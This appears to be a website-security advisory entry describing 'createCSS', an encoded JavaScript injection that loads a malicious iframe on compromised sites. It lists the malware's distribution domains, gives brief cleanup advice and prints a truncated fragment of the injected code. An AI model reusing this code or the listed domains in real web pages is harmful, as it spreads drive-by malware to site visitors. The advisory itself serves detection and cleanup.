Description: Encoded javascript included and used to distribute malware. It calls a malicious iframe once loaded. Also known as "HTTP Malicious Toolkit Variant Activity 12" or "createCSS" malware.
Domains used:
eurox5.biz
http://gator65.hostgator.com/~db905/tds/out.php?s_id=1 (currently disabled)
Affecting: Any web site (no traffic specified)
Clean up: Malware is encoded, but a search / replace should fix it. Contact b>support@sucuri.net</b if you have questions or want us to clean it up for you.
Malware dump:
function createCSS(selector , declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(uas))&&!(/opera/.test(uas))&&(/win/.test(uas));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";...
Full sample: http://tools.sucuri.net/?page=tools&title=blacklist&detail=1904108e77b4e9381c721ad87381e853